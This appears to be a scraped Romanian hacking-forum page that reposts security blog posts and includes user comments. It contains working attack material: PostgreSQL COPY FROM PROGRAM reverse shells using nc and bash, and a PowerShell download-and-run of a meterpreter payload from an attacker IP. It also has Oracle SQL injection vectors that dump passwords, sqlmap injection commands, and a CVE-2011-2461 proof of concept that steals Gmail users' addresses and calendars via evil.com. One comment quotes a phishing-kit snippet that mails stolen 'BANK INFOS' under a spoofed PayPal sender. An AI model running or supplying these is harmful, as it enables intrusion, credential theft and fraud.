OS Command Execution in PostgreSQL >= 9.3 Linux On attacker's machine: nc -lvp 55555 On machine with PostgreSQL: postgres=# create table evil (a text); postgres=# copy evil from program 'mknod backpipe p; nc 192.168.234.138 55555 0<backpipe | /bin/bash 1>backpipe'; Getting backconnect: Windows On attacker's machine: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.234.138 LPORT=443 X > m.exe msfconsole use multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.234.138 set LPORT 443 exploit On machine with PostgreSQL: postgres=# create table evil (a text); postgres=# copy evil from program 'powershell.exe -Command "& {(New-Object Net.WebClient).DownloadFile(\"http://192.168.234.138/m.exe\", \"C:\windows\temp\m.exe\")}"'; postgres=# copy evil from program 'C:\windows\temp\m.exe'; Getting backconnect: Posted by dsrbr at 10:08 AM Sursa: http://dsrbr.blogspot.ru/

Error-based SQL Injection vectors in Oracle using dbms_spm.* functions Testing tables: select * from news where id=1 and dbms_spm.alter_sql_plan_baseline((select stragg(login||chr(58)||pass||chr(44)) from users),1,1,1) is not null; select * from news where id=1 and dbms_spm.create_evolve_task((select stragg(login||chr(58)||pass||chr(44)) from users)) is not null; select * from news where id=1 and dbms_spm.drop_sql_plan_baseline((select stragg(login||chr(58)||pass||chr(44)) from users)) is not null; select * from news where id=1 and dbms_spm.evolve_sql_plan_baseline((select stragg(login||chr(58)||pass||chr(44)) from users)) is not null; select * from news where id=1 and dbms_spm.implement_evolve_task((select login||chr(58)||pass from users where id=1)) is not null; select * from news where id=1 and dbms_spm.load_plans_from_sqlset(1,(select login||chr(58)||pass from users where id=1),1) is not null; select * from news where id=1 and dbms_spm.migrate_stored_outline((select login||chr(58)||pass from users where id=1)) is not null; select * from news where id=1 and dbms_spm.report_auto_evolve_task(1,1,1,1,(select stragg(login||chr(58)||pass||chr(44)) from users)) is not null; select * from news where id=1 and dbms_spm.report_evolve_task((select login||chr(58)||pass from users where id=1)) is not null; Posted by dsrbr at 9:48 AM Sursa: http://dsrbr.blogspot.ru/

SQL Inception: How to select yourself By Aaron Devaney, 30 March 2015 In this blog post I will describe a few ways to view the whole SQL statement being executed as part of a SQL injection attack. Currently, unless the vulnerable page returns the SQL statement in an error message, performing an attack involves an amount of guesswork by the attacker. The more complicated the original SQL statement, the more difficult it can become to extract data using faster UNION based techniques. If the type of injection is blind then this can take time to perform and cause a lot of traffic to be generated, especially when extracting a significant amount of data from the database. This prompted the question - “Wouldn’t this be a lot easier if I could see the SQL being executed?” Databases Store Queries in Tables So far I have discovered methods of extracting the original SQL query via a SQL injection attack on Oracle, Microsoft SQL Server, MySQL and Postgres databases. Other methods and techniques may exist with these and other databases however I find these four to be quite common and they have been my focus for this blog post. For Oracle and MS SQL databases, the query locations that I found require a relatively high privilege account to perform but they also offer the ability to see other queries that have been executed before and by other users. Furthermore, these locations could contain sensitive information such as credentials / hashes and highlight the use of SQL functions and stored procedures which would allow for a much greater understanding of how the application works. MySQL and Postgres The SQL queries that I used to extract the current running query for these two databases are as follows: Postgres*: Select current_query from pg_stat_activity MySQL Select info from information_schema.processlist *– For Postgres, the column name is different depending on the version used. If ‘current_query’ doesn’t work try just ‘query’. When extracting information from these tables it is important to consider what is happening. The database itself will be trying to use these tables at the same time as the web application that we are injecting so occasionally it may report as empty. In my use of this so far, most of the time the query has worked fine in the real world. To test these new techniques, I created a vulnerable web application with a needlessly complicated query and used the above as custom queries in a popular SQL injection tool called SQLMap. In the following example, the vulnerable application is a single web page with a MySQL backend. http://localhost/test/vuln.aspx?album=1465 We can confirm that it is injectable by using payloads like: 1466-1 1465 order by 1 1465 order by 2 Furthermore, we know from using ‘order by 3’ that there are only two columns being returned however the following only returns our original row: 1465 union all select null,null We can still use SQLMap to extract data from the database, as it will find that blind Boolean and time based techniques are working but if we want to extract a lot of data quickly we will need to find out what else the query is doing. For this we can use SQLMap to execute one of the above queries using the --sql-query switch which will return the full SQL statement that is being executed. sqlmap –u “http://localhost/test/vuln.aspx?album=1465” –-sql-query=”select info from information_schema.processlist” Fig .1 - SQLMap output showing the original query on MySQL database Removing the SQL that SQLMap injects we can see the following statement which is being executed by the application including a SQL comment that was left in for demonstration purposes. Select title from ( select asin,title from album where rank = 1465) as test where asin like 'B0000%' -- Misc Comment With the query visible, we can see that it is checking the first column in the outer select for a value like ‘B0000%’ so if we use the following as a payload, we should be able to extract data much faster. 1465 union all select ‘B00000’,TABLE_NAME from INFORMATION_SCHEMA.TABLES Fig.2 - List of table names from the database appended to the normal results MS SQL and Oracle Both MS SQL and Oracle store cached queries that can be accessed by high privilege accounts. For an attacker, this allows us to not only select the current query, but also allows us to access other queries that have been executed as well. This could reveal credentials, function names, stored procedures as well as scheduled jobs that are being executed by the application. For the purpose of this blog however, I will focus on the ability to retrieve the current query. MS SQL 2005+ SELECT st.text from sys.dm_exec_cached_plans cp cross apply sys.dm_exec_sql_text(cp.plan_handle) st Oracle select SQL_TEXT from v$sql It’s important to note that both of these resources will have more than one row and in particular when using blind SQL injection each row could correspond to a variation on the injection. For example, if SQLMap were to send 500 requests to retrieve the current query then these cache tables will at least contain these 500 SQL queries. This poses a problem when performing blind SQL injection because the number of rows will increase with each request. A technique that we can use would be to include criteria in the custom sql-query search terms so that we only select one row which contains something that we are expecting such as a particular ID. To test this I changed the database in my application to Oracle and together with the vulnerable parameter we can craft a SQLMap command as follows. sqlmap –u “http://localhost/test/vuln.aspx?album=513” -–sql-query=”SELECT SQL_TEXT from v$sql where SQL_TEXT like '%513%' and SQL_TEXT not like '%v$sql%' and ROWNUM = 1” Here we attempt to select just the one row from the cache tables that contain our ID 513 but which doesn’t contain references to the cache table such as v$sql. This is so that we don’t select all of the queries that SQLMap will perform which could be 100’s or even 1,000’s. The result is similar to the earlier examples, except we are now able to retrieve the original query without returning the injection SQL statements that SQLMap executes. Fig.3 - SQLMAP output showing the extracted query This produces the following result:select title from ( select asin,title from album where rank=513) where asin like ‘B0000%’ – Misc Comment With both MS SQL and Oracle, we can go a step further and select other queries that have been executed which can allow us to examine the other database calls that an application makes. This can include the use of stored procedures, functions, and scheduled tasks as well as the possibility to retrieve information such as credentials for an application if they are selected from a table. Knowing how to perform the UNION ALL on this vulnerable web page and with the following payload, we can query the Oracle v$sql table to return all of the queries that have been executed recently. Since this application is quite simple there isn’t much that stands out however on a real application this table would contain a lot of different queries possibly dating back days, weeks or even months. http://localhost/test/vuln.aspx?album513+union+all+select+’B000000’,SQL_TEXT+FROM+v$sql As we can see from the results below, there is quite a lot of potentially useful information here and the queries seem to persist for quite some time. Fig.4 - Contents of the v$sql table on an Oracle DB. Future Research As well as enabling a greater understanding of SQL injection vulnerabilities, I hope that this technique may also enhance the current SQL injection tools available. Using these methods, it may be possible for a tool to extract the query first and use the results to modify the behaviour of the tool making them more efficient. I intend to do more research to try and identify other methods of retrieving this information with lower privilege accounts and also to extend the list of databases to gain a more complete coverage of this technique. Contact and Follow-Up Aaron is part of our Assurance team in Context's London office. See the Contact page for how to get in touch. Sursa: SQL Inception: How to select yourself

Penetration Testing or Vulnerability Assessment – Which one should I choose? March 31, 2015 Adrian Furtuna In this post we will take a quick look at the differences between vulnerability assessment (VA) and penetration testing (PT). Furthermore, we’ll give a set of questions that should help you decide which service is the best choice for your particular case.So let’s say you want to improve the security of your internal network infrastructure and you have to choose between VA and PT – offered by your favorite consultancy firm. First of all, let’s see what they are. Vulnerability Assessment – is the process of identifying and prioritizing technical vulnerabilities which affect a target system or network. It is mainly done automatically using a vulnerability scanner and it’s usually aimed at a wide area of machines. The purpose of a VA is to find as many vulnerabilities as possible in the given time frame. Optionally, manual validation may be included for the critical findings but this is not usually done when a high number of vulnerabilities are involved. Penetration Testing – is a goal-based simulation of a real attack. The pentesters will search for a chain of vulnerabilities in the target system/network and exploit them to reach their target (e.g. gain access to a client database, obtain sensitive information, gain Domain Admin, etc). The pentest report will contain only the vulnerabilities encountered during the attack against the target and no additional checks are being made. However, the reported vulnerabilities are 100% validated and their risk for the business is accurate.Neither VA, nor PT should be confused with the security audit which is a totally different service. Articol complet: http://securitycafe.ro/2015/03/31/pentest-versus-vulnerability-scanning/

[h=3]Exploiting CVE-2011-2461 on google.com[/h] As a follow up of our Troopers 2015 presentation about CVE-2011-2461 we want to release more details about a real world exploitation scenario targeting Google services. During our large-scale analysis of web sites hosting vulnerable SWF files, we found out that also Google was affected. [h=3]Attack Flow[/h] In the next lines we are assuming a basic knowledge of the CVE-2011-2461 vulnerability; make sure to read our previous cross-posts on NibbleSec or Minded Security in case you missed something. In addition, please note that we are using evil.com as a "label" for a fictitious site controlled by an attacker. The following steps outline a successful attack: - The victim is logged on google.com, and visits a malicious website - The malicious site loads an HTML page, which embeds the vulnerable SWF together with a malicious SWF resource file (specified via FlashVars) - The vulnerable SWF file is loaded by the Flash player, consequently loading the malicious SWF file (after having verified the crossdomain.xml, hosted on the attacker's site) - Since the malicious SWF inherits the SecurityDomain of the vulnerable SWF, it can access HTTP responses from the victim's domain, leading to an "indirect" Same-Origin Policy bypass in fully patched web browsers and plug-ins. [h=3]Proof of Concept[/h] Here follow the PoC files. 404 Not Found <i>Victim's agenda:</i> <textarea id="x" style="width: 100%; height:50%"></textarea> <object width="100%" height="100%" type="application/x-shockwave-flash" data="https://www.google.com/wonderwheel/wonderwheel7.swf"> <param name="allowscriptaccess" value="always"> <param name="flashvars" value="resourceModuleURLs=http://evil.com/poc/URLr_google.swf"> </object> http://evil.com/crossdomain.xml <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> http://evil.com/poc/URLr_google.swf (ActionScript code below) package { import flash.display.Sprite; import flash.text.TextField; import flash.events.*; import flash.net.*; import flash.external.ExternalInterface; public class URLr_google extends Sprite { public static var app : URLr_google; private static var email : String; public function main():void { app = new URLr_google(); } public function URLr_google() { var url:String = "https://www.google.com/?gws_rd=cr"; var loader:URLLoader = new URLLoader(); configureListeners(loader); var request:URLRequest = new URLRequest(url); try { loader.load(request); } catch (error:Error) { ExternalInterface.call("alert", "Unable to load requested document"); } } private function configureListeners(dispatcher:IEventDispatcher):void { dispatcher.addEventListener(Event.COMPLETE, completeHandler); } private function pingCalendar():void { var url:String = "https://www.google.com/calendar/"; var loader:URLLoader = new URLLoader(); configureListenersCalendar(loader); var request:URLRequest = new URLRequest(url); try { loader.load(request); } catch (error:Error) { ExternalInterface.call("alert", "Unable to load requested document"); } } private function configureListenersCalendar(dispatcher:IEventDispatcher):void { dispatcher.addEventListener(Event.COMPLETE, completeHandlerCalendar); } private function getAgenda():void { var url:String = "https://www.google.com/calendar/htmlembed?skipwarning=true&eopt=3&mode=AGENDA&src=" + email; var loader:URLLoader = new URLLoader(); configureListenersAgenda(loader); var request:URLRequest = new URLRequest(url); try { loader.load(request); } catch (error:Error) { ExternalInterface.call("alert", "Unable to load requested document"); } } private function configureListenersAgenda(dispatcher:IEventDispatcher):void { dispatcher.addEventListener(Event.COMPLETE, completeHandlerAgenda); } private function completeHandler(event:Event):void { var loader:URLLoader = URLLoader(event.target); var s:String = loader.data; var pattern:RegExp = /[a-z0-9._-]+@[a-z0-9._-]+\.[a-z]+/i; var results:Array = s.match(pattern); if (results.length > 0) { email = results[0]; ExternalInterface.call("eval", "alert('Email address: " + email + "')"); pingCalendar(); } } private function completeHandlerCalendar(event:Event):void { getAgenda(); } private function completeHandlerAgenda(event:Event):void { var loader:URLLoader = URLLoader(event.target); var res:String = escape(loader.data); ExternalInterface.call("eval", "document.getElementById('x').value='" + res + "';document.getElementById('x').value=unescape(document.getElementById('x').value)"); var pattern:RegExp = /title>[a-z0-9]+\s[a-z0-9]+<\/title/i; var results:Array = unescape(res).match(pattern); if (results.length > 0) { var name:String = results[0]; name = (name.substring(name.indexOf(">") + 1)).split("<")[0]; ExternalInterface.call("eval", "alert('Name and surname:" + name + "')"); } } } } By asking the victim to access the page located at 404 Not Found, the attacker is able to steal the following information: Gmail address FirstName LastName Future events stored in Google Calendar By inspecting the malicious resource "module", you will notice that it makes three different HTTP requests: 1st GET request to https://www.google.com/?gws_rd=cr to steal the victim's email address; 2nd GET request to https://www.google.com/calendar/ to initialize the Google Calendar for the current session; 3rd GET request to https://www.google.com/calendar/htmlembed?skipwarning=true&eopt=3&mode=AGENDA&src=[JUST_STOLEN_EMAIL_ADDRESS] to steal the victim's first name, last name and agenda. Obviously, many other attack scenarios are possible, depending on the pages functionalities. For instance, the malicious SWF could steal anti-CSRF tokens and perform actions on behalf of the user. For the sake of transparency: we reported the issue to Google security team early in December, and they quickly patched it and awarded us thanks to their bug bounty program. Cheers! As a final reminder to developers, website's owners and security teams: ParrotNG is your friend! Make sure to inspect all hosted SWF files, or at least sandbox them under different domains. In the latter, ensure that sensitive domains are not giving trust to sandboxing domains through relaxed crossdomain policy files, since the "trust chain" would cancel out the benefits of such domains partition. Brought to you by Mauro Gentile and Luca Carettoni Posted by Mauro Gentile at 8:11 AM Email This Sursa: http://blog.mindedsecurity.com/2015/03/exploiting-cve-2011-2461-on-googlecom.html

Salut, Poate sa fie de la niste update-uri de cacat, nu am idee, dar azi nu imi mergea netul (conexiune catre router). Am verificat conexiunea prin router pe telefon si parea ok. Am vazut ca merge foarte putin timp, apoi nu mai merge. Isi ia setarile de retea prin DHCP, dar nu rezolva DNS-uri si nu se conecteaza direct pe IP. Nu am pornit Wireshark ca nu am avut timp, sa vad ce se intampla, dar dupa ce am DEZINSTALAT Kaspersky, a mers. PS: Nu a mers doar sa opresc protectia. Am postat in cazul in care patesc si altii la fel, sa stie despre ce e vorba. O bila neagra pentru rusi. Muie.

Buna treaba. $to = "White4142@live.com"; // Email Here $subject = "BANK INFOS = [$ip]"; $headers = "From: PP-Rezult <paypal@support.com>"; $headers .= $_POST['eMailAdd']."\n"; $headers .= "MIME-Version: 1.0\n";

Scripting Metasploit for a Real-Life Pentest March 25, 2015 Ionu? Ambrosie During a recent internal penetration test, we got to the point where we had to search a lot of Windows machines for Domain Admin tokens. Of course, our objective was to impersonate such a (delegation) token with Metasploit and create our own Domain Admin user.Since the search space was quite large, we had to automate this task by creating a custom Metasploit script. In this post we detail the creation of this script and its results. A bit of context During our penetration test we’ve managed to obtain the credentials of a privileged user. This user, let’s call him Robert, had local administrative rights on multiple workstations in the Windows domain.Furthermore, we’ve managed to create a low privileged domain user, which we’ll further denote by OurUser, but we were not able to add it to the Domain Admins group.However, we came up with the idea of using Robert’s credentials to log in to as many hosts as possible and hope we can impersonate a more privileged user. By leveraging its privileges, we hoped we would be able to add OurUser to the Domain Admins group.We’ve used the SMB Login Check Scanner in Metasploit for determining the range of hosts in the local domain which allowed us access with Robert’s credentials. Armed with this list, we were faced with the Sisyphean task of connecting to each host and, using a combination of psexec_psh and reverse_tcp, open a meterpreter shell and then issue the appropriate commands. Articol complet: Scripting Metasploit for a Real-Life Pentest – Security Café

Torrent pe undeva?

Da, simplu si eficient: https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636

"High security file deletion algorithm" - Bla bla

Asa inveti, incercand si acceptand critici. Continua.

Nu stau sa va citesc balariile. Thread closed.